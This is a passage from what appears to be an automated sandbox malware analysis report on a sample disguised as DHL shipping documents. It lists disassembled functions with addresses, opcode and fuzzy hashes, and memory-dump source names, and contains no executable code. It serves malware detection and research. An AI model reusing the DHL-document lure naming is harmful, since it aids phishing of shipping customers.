                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2e58024004901f79088a6a7f6966a5e1cd9c35f73a77db61ea105844f63446f
                                                • Instruction ID: 38b443c0956db801c9567f1f2bab2615486761eec5e8b698d9d0245e482e0939
                                                • Opcode Fuzzy Hash: e2e58024004901f79088a6a7f6966a5e1cd9c35f73a77db61ea105844f63446f
                                                • Instruction Fuzzy Hash: 7A31C97172DE4A8FE756EB388055766B7E2EF9A30075085BAC04FC3696DE38E8058381
                                                Function 00007FFAACCD4C65 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31ba40f36c90c39e51af84ff311bccb7ab2c1249e0d7bdf3ec7d1fc44423bf06
                                                • Instruction ID: 44527edc5158bd51c6b2dbf04e4c04f0d25cdd15b84bddb2a82749129238f081
                                                • Opcode Fuzzy Hash: 31ba40f36c90c39e51af84ff311bccb7ab2c1249e0d7bdf3ec7d1fc44423bf06
                                                • Instruction Fuzzy Hash: A631EFB2A2CF454BA6589F1C94465B5B3E1FF98310B40467FE05FC36A6DF24F80646C2
                                                Function 00007FFAACCD3E50 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b626a5d42133a440921a8982bba5a7dbc51929d6c13c4ce532316f20905b246
                                                • Instruction ID: 4c6a975948b5b0e467d1d06581de0287e221d098631b47c1219a411cc2599637
                                                • Opcode Fuzzy Hash: 3b626a5d42133a440921a8982bba5a7dbc51929d6c13c4ce532316f20905b246
                                                • Instruction Fuzzy Hash: B221E3B162CA494FEB4CAA289846AF977D0EF99310F4040AEF45F83297DD25E80642C2
                                                Function 00007FFAACCF3110 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 645a39d202e70018135c4f60863ca0a6f00909b60540f8dc82f6ab5607fd171d
                                                • Instruction ID: 4a47c8e021e9f19cf33a2fd5f601aab7f562f2de61afbfbc9ef05bc62a6c5147
                                                • Opcode Fuzzy Hash: 645a39d202e70018135c4f60863ca0a6f00909b60540f8dc82f6ab5607fd171d
                                                • Instruction Fuzzy Hash: DA31B77280E7969FE716AB3CD4984E57FA0EF53218B0842F7C089CE093DB249449C3D5
                                                Function 00007FFAACCFF740 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d118f1ef7ad854018687e3a8b0bd4afba82b95201e04263949c10560f0f242d
                                                • Instruction ID: 443b536e8a66b1989ed7e7dc7f7467eed9794e11e7fec70b6ecf5be71074cb1d
                                                • Opcode Fuzzy Hash: 5d118f1ef7ad854018687e3a8b0bd4afba82b95201e04263949c10560f0f242d
                                                • Instruction Fuzzy Hash: 4B31D170719E0A9FEBA4EB1DD484E62B7E1FF69314B50817AD01EC3695DE21FC848780
                                                Function 00007FFAACCE38E0 Relevance: .1, Instructions: 107COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40aea2cf21dd80b66028367aa6a404e5e2af6ab790235303bcdb30b6e3d39061
                                                • Instruction ID: c20936bad0609b26c750bfc37760ae75ec9f0e1e06e8c3ed6b7c868609076707
                                                • Opcode Fuzzy Hash: 40aea2cf21dd80b66028367aa6a404e5e2af6ab790235303bcdb30b6e3d39061
                                                • Instruction Fuzzy Hash: 4A31C23161DB098FE745EB1CD084A66B7E1EB9A314F04467AE44DC3265DF35E88587C2
                                                Function 00007FFAACCD1D68 Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2cf70e1cbdd0bb610ba01b1fd300dcccf0cf42279b89ebf99e1ce5747fb1dcf1
                                                • Instruction ID: fd0ef0a4f212dd00bbbf355be3983ad685c32dd51592f57f57c33e07d4cfbe38
                                                • Opcode Fuzzy Hash: 2cf70e1cbdd0bb610ba01b1fd300dcccf0cf42279b89ebf99e1ce5747fb1dcf1
                                                • Instruction Fuzzy Hash: C6313C30619A098FEBA4EF28C044B6577E1FF5A315F5045B9E84DC72A1DF65E848C780
                                                Function 00007FFAACCE9F80 Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f00bc336b53cae6d0ee40b2c0fc88bb4f1f63b87d164c4bfd0ee5bf3667a7be9
                                                • Instruction ID: 6f7a8d07d3b085184cfbb7223cae1c63ceff5b1c7017c5aa3f3e7f02c29ba4e3
                                                • Opcode Fuzzy Hash: f00bc336b53cae6d0ee40b2c0fc88bb4f1f63b87d164c4bfd0ee5bf3667a7be9
                                                • Instruction Fuzzy Hash: 66210A61B19E098FFAA4AA1C5445BB677C2EF96724B10857AD00FC3696DE29EC0742C1
                                                Function 00007FFAACCD2F00 Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 303e8c1405cdcc1ebaa974c781280af444946fe0a6916d06c642171a467e1f72
                                                • Instruction ID: abf669f1106b140d7bf24d245ac18e71dd77109bc1a9239c7531aca8c7992bbc
                                                • Opcode Fuzzy Hash: 303e8c1405cdcc1ebaa974c781280af444946fe0a6916d06c642171a467e1f72
                                                • Instruction Fuzzy Hash: 5921CC30619A198FE759EF28D094575B7E2FB9A305B1042BED44EC7292CE36F886C7C0
                                                Function 00007FFAACCD1C3F Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed2a47a8ba3f3caeb452c49ff11b65eff664e1ee517bd51648f0740957f3543f
                                                • Instruction ID: fd78748ace51e655c0d4c9b01f5098e23ab8c2a30aa7044c7cf842d6f33a6829
                                                • Opcode Fuzzy Hash: ed2a47a8ba3f3caeb452c49ff11b65eff664e1ee517bd51648f0740957f3543f
                                                • Instruction Fuzzy Hash: C7216031718D089FE698EA2CD459E7577D1EBA9311B1041AEE01EC36A6DE61EC468780
                                                Function 00007FFAACCD3600 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 979a4e5168464258f266bf6dcd78cfbf346348a7a0948fb4ee8b05f1778065d0
                                                • Instruction ID: 25fbe8dbf9af49a2cc40a9b8f11a61e8f96f06be2b14a4e28f8610ea1eb63980
                                                • Opcode Fuzzy Hash: 979a4e5168464258f266bf6dcd78cfbf346348a7a0948fb4ee8b05f1778065d0
                                                • Instruction Fuzzy Hash: 5C31FB61E1DB8ADFE795A73C88156A4BBA0FF16311F0441F5D01DDB1D3DD28AC458782
                                                Function 00007FFAACCDA719 Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a28c4e45731e8717a60141dfc761bc89e186d9ac4c6da2c962a5a4f99a761a
                                                • Instruction ID: cc30ac34a86e896b759d84b5f42c33d1b87b6db4313b68a4b4af19070e95c6e5
                                                • Opcode Fuzzy Hash: 52a28c4e45731e8717a60141dfc761bc89e186d9ac4c6da2c962a5a4f99a761a
                                                • Instruction Fuzzy Hash: 4421B71191E7C64FE347977444216A1BFB1AF97210B4E81FBD08DCB093ED1CD9198392
                                                Function 00007FFAACCD31A8 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 228f517a5a4718e9241cd88c41c518fe0cc1615553762ec750433728c6a3ff35
                                                • Instruction ID: 83fe716501b74b7158ac7522ac83c9fbf9c7361d598e39d7e94c22d51614e354
                                                • Opcode Fuzzy Hash: 228f517a5a4718e9241cd88c41c518fe0cc1615553762ec750433728c6a3ff35
                                                • Instruction Fuzzy Hash: 54215C307199098FDAA4EF2CD458F65B3E1FF5A310B5581BAD41DC72A6DE24EC858780
                                                Function 00007FFAACCD8520 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c44b03f7305ad46b934ad4a228f7b16714d3cdc1d0204a56a9b0023b63dee5a
                                                • Instruction ID: e4ccb1544eab60cf2e60e10b45913afad4dac1f34ed70799cc62b3356605e3d3
                                                • Opcode Fuzzy Hash: 2c44b03f7305ad46b934ad4a228f7b16714d3cdc1d0204a56a9b0023b63dee5a
                                                • Instruction Fuzzy Hash: BF11F331A2890A8FE6A8DF2CD445676B3D5FF96310B5087B9D01EC3686DF38E8428784
                                                Function 00007FFAACCF2EB8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e3bc6e989c91f410a65a5ce0086b2d01a3b67010ec7089ce826674890950f4e
                                                • Instruction ID: ac5d5b6da11eeba95f3123dd44ea12980e8a436f27d994da8e50a161b56f87a0
                                                • Opcode Fuzzy Hash: 2e3bc6e989c91f410a65a5ce0086b2d01a3b67010ec7089ce826674890950f4e
                                                • Instruction Fuzzy Hash: 53118E31928F19CBEB60EF19D8419A7B7E1FB99715B100A3AE48FC3650DA21F445C7C2
                                                Function 00007FFAACCE3E30 Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f842eb5dc1c7a68de34d85c9914a529861ffcfea148ec58aeb93e0998d05b2b0
                                                • Instruction ID: 91b5df04c63cb25dc55c901bba1f015df78f824cf418a11c1c8fc8975f0aa364
                                                • Opcode Fuzzy Hash: f842eb5dc1c7a68de34d85c9914a529861ffcfea148ec58aeb93e0998d05b2b0
                                                • Instruction Fuzzy Hash: 36119130A19E068BFAA99B3C4445771B2D1FF9A300B1C857DD01EC3184DF28FC898780
                                                Function 00007FFAACCD35A0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adb5032d77ea71a3af55370a2b4130e6698ce9d857c6a3057e48ec4421be8eaf
                                                • Instruction ID: 35442aa139989d44ce09aa50db631a88f8c45922b7ed2581dae39d277cc1202e
                                                • Opcode Fuzzy Hash: adb5032d77ea71a3af55370a2b4130e6698ce9d857c6a3057e48ec4421be8eaf
                                                • Instruction Fuzzy Hash: 70114820A1E549AFE382A72D9844AB07BE1EF46310B5641F6D01EC7197CA19BC89C3D0
                                                Function 00007FFAACCD7490 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e84278fa26e3682e2251edc0efed922669854c1f1ac0a194f37631680d9a9563
                                                • Instruction ID: a323549b3a84c16708ccca596a763d55ecc0562c981c88da21572fd50cae0831
                                                • Opcode Fuzzy Hash: e84278fa26e3682e2251edc0efed922669854c1f1ac0a194f37631680d9a9563
                                                • Instruction Fuzzy Hash: 98012B61B2CD050B626CF62DA4495B6B3D0EFA932571041BFE02FC3597ED14FC4642C1
                                                Function 00007FFAACCDB763 Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b2be2b687ea501c6b18df92fa65bcc3f1bf47cec52b964625e90ef2f529bd72
                                                • Instruction ID: 9a94d25d5e55097450c609224082881547879ed344c5052df880b4650c946021
                                                • Opcode Fuzzy Hash: 9b2be2b687ea501c6b18df92fa65bcc3f1bf47cec52b964625e90ef2f529bd72
                                                • Instruction Fuzzy Hash: 1001B521B19E098BF689DB1C685637573C2EBDA711B15817FD00EC33A6CD25EC574382
                                                Function 00007FFAACCE40B0 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e333ffc575c03d8c78db9ba860930eb3f78c205698844f969fadc92f01f7933
                                                • Instruction ID: bc38b1f65a48655e27e825aa1155e97254d48942cdbca5f6ca24e9461c1fb815
                                                • Opcode Fuzzy Hash: 6e333ffc575c03d8c78db9ba860930eb3f78c205698844f969fadc92f01f7933
                                                • Instruction Fuzzy Hash: D101681051E58A4FE34AAB7898699B17BE0EF83310B4841F7E04DCB197DE0CD88B83C1
                                                Function 00007FFAACCDB46D Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abebfe8a167cc42df751ecf1afa5551127984cf692694cbb96f9f836aaf5bc5c
                                                • Instruction ID: f5cba58b61b6f94d040556bd599cae632211086a69dba264ef8a27e08d36a3b7
                                                • Opcode Fuzzy Hash: abebfe8a167cc42df751ecf1afa5551127984cf692694cbb96f9f836aaf5bc5c
                                                • Instruction Fuzzy Hash: AC01D662B2DD164BB56DAB1CB4512B973C1EF4972075081BFE05EC328BDD28EC5742C6
                                                Function 00007FFAACCDA13A Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fba6a6aaaa745aa034cfa9252765c17f7945d9711343a782ecce89b271d5902
                                                • Instruction ID: 331e17f166c79baca6d5ec2528b8cd9b91151a76c9144e95b1b5dca7d83669fb
                                                • Opcode Fuzzy Hash: 0fba6a6aaaa745aa034cfa9252765c17f7945d9711343a782ecce89b271d5902
                                                • Instruction Fuzzy Hash: 0101D692B1AE4ADFF3CA9B6C041437492C3EFC556179951BBD40ED3292EE18DC594384
                                                Function 00007FFAACCD8C39 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08ce147fd87a37571a68497e24cdd80d19d25e145814fc264b38ce7800bec1ec
                                                • Instruction ID: 92f49e2c434e026f25e6cc1fb64a7f0beea3dfa007c93ad942c8f846ad06a1a3
                                                • Opcode Fuzzy Hash: 08ce147fd87a37571a68497e24cdd80d19d25e145814fc264b38ce7800bec1ec
                                                • Instruction Fuzzy Hash: 2D019270C1978E8FDB46EF2888551A97FF0FF59200F4405EBE45CC3292DA7999548781
                                                Function 00007FFAACCFF730 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5fe6f6d3128519f6c2552de7a72e63388ab11bf350b19f51f1d78238dd5498e
                                                • Instruction ID: 69a434a4c9646fb684a20fff4132f441d9ebdf8329ff2a0010755c2f9cb64b72
                                                • Opcode Fuzzy Hash: d5fe6f6d3128519f6c2552de7a72e63388ab11bf350b19f51f1d78238dd5498e
                                                • Instruction Fuzzy Hash: 0D01B120B1EB858FE7C7976D04981746BE1EF5B20135A40FBD01ECB2A2E848DC0A8391
                                                Function 00007FFAACD05D80 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a803aa479bd3a348ef6c67c720751b1e735ce88b878e013fdcb89745aa1b638f
                                                • Instruction ID: 011ee29e76326eff093022eebb4fda3ce3d4a9ce83964cbccd2673c88b6e014d
                                                • Opcode Fuzzy Hash: a803aa479bd3a348ef6c67c720751b1e735ce88b878e013fdcb89745aa1b638f
                                                • Instruction Fuzzy Hash: 57F04610B0991E4FFFE8A36DB4982B536D1EF4922070500FAE82EC7195E855CCC583C4
                                                Function 00007FFAACCD8BA2 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6da6bbe928d55b6e94d42819c499d15e93d211ddebf7b23b4d08b9dde96f17ef
                                                • Instruction ID: ebc316b23dc2f2e9cd1ead2bf038174d0c27c61889de1286603681fc51c0942a
                                                • Opcode Fuzzy Hash: 6da6bbe928d55b6e94d42819c499d15e93d211ddebf7b23b4d08b9dde96f17ef
                                                • Instruction Fuzzy Hash: 99F0F610729E0F8FFAD6EB2C948077A73D2EF9636075445BAC40EC3286DD24E94687C0
                                                Function 00007FFAACCD7508 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ede9b75885033ca2b5fd0ca1a2ba2f4c49fa5f4abc8e35cb164f77e485742ba
                                                • Instruction ID: d478840ecb36d8387ac25ac14aa153fe11b884be95d2e3c75ded907a796b9ca8
                                                • Opcode Fuzzy Hash: 4ede9b75885033ca2b5fd0ca1a2ba2f4c49fa5f4abc8e35cb164f77e485742ba
                                                • Instruction Fuzzy Hash: 7AF0F631118A4C8FD740EB18E40499673D1FBC5314F40467BE84DD7264DE29D945CBC1
                                                Function 00007FFAACCF31B0 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60e38e069e5cbd97d2d42c0d936c0d32d1e934ddb6ac5eac2d81993220d1eab8
                                                • Instruction ID: 42e0f25e51832b8c88e1a0e5a8949c79f7198ccb06aaaec2b5ac3d28e4d6cf7b
                                                • Opcode Fuzzy Hash: 60e38e069e5cbd97d2d42c0d936c0d32d1e934ddb6ac5eac2d81993220d1eab8
                                                • Instruction Fuzzy Hash: F5F0A430906B0AABEB69EF15C44CA7277D5EF5A315F14053ED00EC75A1DA25E889C790
                                                Function 00007FFAACCD357D Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc7335cc9f5af8ed9a05f23bac28fe154decad21e21b22071902b0b7babf3f8c
                                                • Instruction ID: aa553b25d319503c738d1768b21367f12e636b582e03c338a8f8a7a146665661
                                                • Opcode Fuzzy Hash: bc7335cc9f5af8ed9a05f23bac28fe154decad21e21b22071902b0b7babf3f8c
                                                • Instruction Fuzzy Hash: 0DF02B11B2A81B4776D473BD24C92FD9785EFDD2217588277E05DC3182ED48D84A43C4
                                                Function 00007FFAACCD2B5A Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bbbf3d73c272ea516b68f2069efab3943ac9232b66bb579848b828d45117ddf4
                                                • Instruction ID: 4332653de9c8e96fe283b880c80a6ae11fdb0149db2f3ce14571a81c86858a82
                                                • Opcode Fuzzy Hash: bbbf3d73c272ea516b68f2069efab3943ac9232b66bb579848b828d45117ddf4
                                                • Instruction Fuzzy Hash: A6F0B462A1DB8B9EE786AB2850222F8BBA09F5B210F4500F6D00DC75C3DD1D5C5843D2
                                                Function 00007FFAACDE0C33 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453977478.00007FFAACDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacde0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b54041900cee6ce999659f4df391f0bd321ecf06d2c68f61ddbdedeff0f17f8b
                                                • Instruction ID: c4d5775efcca46900c24471949a2faffe0e2fc77dd2d3be015366e03e742c116
                                                • Opcode Fuzzy Hash: b54041900cee6ce999659f4df391f0bd321ecf06d2c68f61ddbdedeff0f17f8b
